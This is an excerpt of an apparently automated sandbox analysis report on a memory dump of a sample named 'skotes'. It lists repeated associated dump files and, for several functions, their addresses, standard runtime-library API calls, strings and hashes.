Associated: 00000006.00000002.2975539261.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975712668.0000000000BCA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975930946.0000000000BD1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976189209.0000000000BEE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976395931.0000000000BF3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976395931.0000000000C11000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976880868.0000000000C3F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977217260.0000000000C40000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977562118.0000000000C41000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977779299.0000000000C44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977998863.0000000000C46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2978168524.0000000000C56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2978390609.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_940000_skotes.jbxd

Yara matches

Similarity

API ID: CacheGroupLocalSchedule$Concurrency::details::SegmentSegment::std::invalid_argument::invalid_argument
String ID: count$ppVirtualProcessorRoots
API String ID: 2663199487-3650809737
Opcode ID: d74889e6b5fe8dab2ef239e11fdf96704b17fdd0df3fb9cb1c636eb042f21f0e
Instruction ID: db2bdca31c722f8b3bdea87e2ca9a5720c4e1519494b2cc23c33298926505d60
Opcode Fuzzy Hash: d74889e6b5fe8dab2ef239e11fdf96704b17fdd0df3fb9cb1c636eb042f21f0e
Instruction Fuzzy Hash: B621DE35A00215EFCF14EFA8C892EAD77B5BF88314F004069F9169B691CB32AE01CB91

Function 0096B975 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 64COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0096BA0E

Strings

RoUninitialize, xrefs: 0096B9C1
RoInitialize, xrefs: 0096B998
combase.dll, xrefs: 0096B983, 0096B988, 0096B99D, 0096B9C8

Memory Dump Source

Source File: 00000006.00000002.2960262313.0000000000941000.00000040.00000001.01000000.00000007.sdmp, Offset: 00940000, based on PE: true

Associated: 00000006.00000002.2959959469.0000000000940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2960262313.00000000009A2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2963225351.00000000009A9000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2963895265.00000000009AB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2964785557.00000000009B7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2966475323.0000000000B0F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2966741111.0000000000B11000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967055819.0000000000B24000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967055819.0000000000B30000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967559238.0000000000B34000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967788512.0000000000B35000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967968423.0000000000B36000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968262430.0000000000B38000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968402647.0000000000B3A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968707394.0000000000B3C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2969551208.0000000000B45000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970023802.0000000000B46000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970506072.0000000000B47000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970863169.0000000000B48000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971131605.0000000000B63000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971393726.0000000000B64000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971653636.0000000000B66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971851409.0000000000B67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972152564.0000000000B6F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972407654.0000000000B74000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972592296.0000000000B75000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972777856.0000000000B79000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972998935.0000000000B8E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973179747.0000000000B91000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973392344.0000000000B92000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973608752.0000000000B96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973780405.0000000000B9D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974000799.0000000000BA0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974168686.0000000000BA7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974364643.0000000000BA8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974575970.0000000000BB0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974786379.0000000000BB2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974992299.0000000000BC1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975203667.0000000000BC2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975337697.0000000000BC4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975539261.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975712668.0000000000BCA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975930946.0000000000BD1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976189209.0000000000BEE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976395931.0000000000BF3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976395931.0000000000C11000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976880868.0000000000C3F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977217260.0000000000C40000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977562118.0000000000C41000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977779299.0000000000C44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977998863.0000000000C46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2978168524.0000000000C56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2978390609.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_940000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error
String ID: RoInitialize$RoUninitialize$combase.dll
API String ID: 348560076-3997890769
Opcode ID: 076aa01a0a2e1186fe792e2c795c26a193dfa9727d890778a72a8159861e78b0
Instruction ID: 9449a0d1cff8e40fab903aedb36ecb84228d7178a8f9f53a25cb2e38ea5b9948
Opcode Fuzzy Hash: 076aa01a0a2e1186fe792e2c795c26a193dfa9727d890778a72a8159861e78b0
Instruction Fuzzy Hash: C6012871586316AEEB10FBF65C42BBB31EC9F0234DF211829B590E2191FF25D8028BE5

Function 00966E1C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61COMMON

Download Yara Rule

APIs

SafeRWList.LIBCONCRT ref: 00966E73

Part of subcall function 00964E6E: Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 00964E7F
Part of subcall function 00964E6E: List.LIBCMT ref: 00964E89

std::invalid_argument::invalid_argument.LIBCONCRT ref: 00966E85
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00966EAA

Strings

eventObject, xrefs: 00966E7D

Memory Dump Source

Source File: 00000006.00000002.2960262313.0000000000941000.00000040.00000001.01000000.00000007.sdmp, Offset: 00940000, based on PE: true

Associated: 00000006.00000002.2959959469.0000000000940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2960262313.00000000009A2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2963225351.00000000009A9000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2963895265.00000000009AB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2964785557.00000000009B7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2966475323.0000000000B0F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2966741111.0000000000B11000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967055819.0000000000B24000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967055819.0000000000B30000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967559238.0000000000B34000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967788512.0000000000B35000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967968423.0000000000B36000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968262430.0000000000B38000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968402647.0000000000B3A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968707394.0000000000B3C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2969551208.0000000000B45000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970023802.0000000000B46000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970506072.0000000000B47000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970863169.0000000000B48000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971131605.0000000000B63000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971393726.0000000000B64000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971653636.0000000000B66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971851409.0000000000B67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972152564.0000000000B6F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972407654.0000000000B74000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972592296.0000000000B75000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972777856.0000000000B79000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972998935.0000000000B8E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973179747.0000000000B91000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973392344.0000000000B92000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973608752.0000000000B96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973780405.0000000000B9D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974000799.0000000000BA0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974168686.0000000000BA7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974364643.0000000000BA8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974575970.0000000000BB0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974786379.0000000000BB2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974992299.0000000000BC1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975203667.0000000000BC2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975337697.0000000000BC4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975539261.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975712668.0000000000BCA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975930946.0000000000BD1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976189209.0000000000BEE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976395931.0000000000BF3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976395931.0000000000C11000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976880868.0000000000C3F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977217260.0000000000C40000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977562118.0000000000C41000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977779299.0000000000C44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977998863.0000000000C46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2978168524.0000000000C56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2978390609.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_940000_skotes.jbxd

Yara matches

Similarity

API ID: List$AcquireConcurrency::details::_Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorLock::_ReaderSafeWriteWriterstd::invalid_argument::invalid_argument
String ID: eventObject
API String ID: 1288476792-1680012138
Opcode ID: 6a0850971fc25feace40a5a7949dc89d9148b3ef8bf502a337cec5a0c0ce751a
Instruction ID: 29b3158da041bb56cf50e34af39fd8495b9c314f306fa83d11ff1ec9752be760
Opcode Fuzzy Hash: 6a0850971fc25feace40a5a7949dc89d9148b3ef8bf502a337cec5a0c0ce751a
Instruction Fuzzy Hash: 7F110476940304EBEF25EBA8CD86FEE77AC6F40348F204515F515A60C1DB75AE04CAA5

Function 0096A0EE Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35threadCOMMON

Download Yara Rule

APIs

Concurrency::details::SchedulerProxy::GetCurrentThreadExecutionResource.LIBCMT ref: 0096A102
Concurrency::details::ResourceManager::RemoveExecutionResource.LIBCONCRT ref: 0096A126
std::invalid_argument::invalid_argument.LIBCONCRT ref: 0096A139

Strings

pScheduler, xrefs: 0096A131

Memory Dump Source

Source File: 00000006.00000002.2960262313.0000000000941000.00000040.00000001.01000000.00000007.sdmp, Offset: 00940000, based on PE: true

Associated: 00000006.00000002.2959959469.0000000000940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2960262313.00000000009A2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2963225351.00000000009A9000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2963895265.00000000009AB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2964785557.00000000009B7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2966475323.0000000000B0F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2966741111.0000000000B11000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967055819.0000000000B24000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967055819.0000000000B30000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967559238.0000000000B34000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967788512.0000000000B35000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967968423.0000000000B36000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968262430.0000000000B38000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968402647.0000000000B3A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968707394.0000000000B3C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2969551208.0000000000B45000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970023802.0000000000B46000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970506072.0000000000B47000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970863169.0000000000B48000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971131605.0000000000B63000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971393726.0000000000B64000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971653636.0000000000B66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971851409.0000000000B67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972152564.0000000000B6F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972407654.0000000000B74000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972592296.0000000000B75000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972777856.0000000000B79000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972998935.0000000000B8E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973179747.0000000000B91000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973392344.0000000000B92000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973608752.0000000000B96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973780405.0000000000B9D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974000799.0000000000BA0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974168686.0000000000BA7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974364643.0000000000BA8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974575970.0000000000BB0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974786379.0000000000BB2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974992299.0000000000BC1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975203667.0000000000BC2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975337697.0000000000BC4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975539261.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975712668.0000000000BCA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975930946.0000000000BD1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976189209.0000000000BEE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976395931.0000000000BF3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976395931.0000000000C11000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976880868.0000000000C3F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977217260.0000000000C40000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977562118.0000000000C41000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977779299.0000000000C44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977998863.0000000000C46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2978168524.0000000000C56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2978390609.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_940000_skotes.jbxd

Yara matches

Similarity

API ID: Resource$Concurrency::details::Execution$CurrentManager::Proxy::RemoveSchedulerThreadstd::invalid_argument::invalid_argument
String ID: pScheduler
API String ID: 246774199-923244539
Opcode ID: 978250d9ffe65a49bc1fdabae081ed710e0bac8a8821ec270640a9d72c3229b9
Instruction ID: c0d9410f80552fce392744c2e2588f9ec19a8f94fe4dd87bf2971df27e4180e8
Opcode Fuzzy Hash: 978250d9ffe65a49bc1fdabae081ed710e0bac8a8821ec270640a9d72c3229b9
Instruction Fuzzy Hash: FEF0E936904204A7CF20FA55DC82DAEB37C9ED2714B11C129E40567181DF71AE06CAD2

Function 0097CBDF Relevance: 6.3, APIs: 4, Instructions: 320COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 0097CC66

Memory Dump Source

Source File: 00000006.00000002.2960262313.0000000000941000.00000040.00000001.01000000.00000007.sdmp, Offset: 00940000, based on PE: true

Associated: 00000006.00000002.2959959469.0000000000940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2960262313.00000000009A2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2963225351.00000000009A9000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2963895265.00000000009AB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2964785557.00000000009B7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2966475323.0000000000B0F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2966741111.0000000000B11000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967055819.0000000000B24000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967055819.0000000000B30000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967559238.0000000000B34000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967788512.0000000000B35000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967968423.0000000000B36000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968262430.0000000000B38000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968402647.0000000000B3A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2968707394.0000000000B3C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2969551208.0000000000B45000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970023802.0000000000B46000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970506072.0000000000B47000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2970863169.0000000000B48000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971131605.0000000000B63000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971393726.0000000000B64000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971653636.0000000000B66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2971851409.0000000000B67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972152564.0000000000B6F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972407654.0000000000B74000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972592296.0000000000B75000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972777856.0000000000B79000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2972998935.0000000000B8E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973179747.0000000000B91000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973392344.0000000000B92000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973608752.0000000000B96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2973780405.0000000000B9D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974000799.0000000000BA0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974168686.0000000000BA7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974364643.0000000000BA8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974575970.0000000000BB0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974786379.0000000000BB2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2974992299.0000000000BC1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975203667.0000000000BC2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975337697.0000000000BC4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975539261.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975712668.0000000000BCA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2975930946.0000000000BD1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976189209.0000000000BEE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976395931.0000000000BF3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976395931.0000000000C11000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2976880868.0000000000C3F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977217260.0000000000C40000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977562118.0000000000C41000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977779299.0000000000C44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2977998863.0000000000C46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2978168524.0000000000C56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2978390609.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_940000_skotes.jbxd

Yara matches

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: c90ae3db66b5619743134332522a0b96de832b73a835be1452314c5289bd2e52
Instruction ID: efadfe54c9e70b0d6dc0c27bab602e9d9424d9b8d8426a3eaf09d19e8736dcc4
Opcode Fuzzy Hash: c90ae3db66b5619743134332522a0b96de832b73a835be1452314c5289bd2e52
Instruction Fuzzy Hash: 9CB137B39046459FDB21CF68C8817AEBBE9EF45340F18C56EE859EB382D6348D01CB60

Function 009867A9 Relevance: 6.2, APIs: 4, Instructions: 245COMMON

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 00986902
__alloca_probe_16.LIBCMT ref: 00986998
__freea.LIBCMT ref: 00986A03
__freea.LIBCMT ref: 00986A0F

Memory Dump Source

Source File: 00000006.00000002.2960262313.0000000000941000.00000040.00000001.01000000.00000007.sdmp, Offset: 00940000, based on PE: true

Associated: 00000006.00000002.2959959469.0000000000940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2960262313.00000000009A2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2963225351.00000000009A9000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2963895265.00000000009AB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2964785557.00000000009B7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2966475323.0000000000B0F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2966741111.0000000000B11000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2967055819.0000000000B24000.00000040.00000001.01000000.00000007.sdmpDownload File
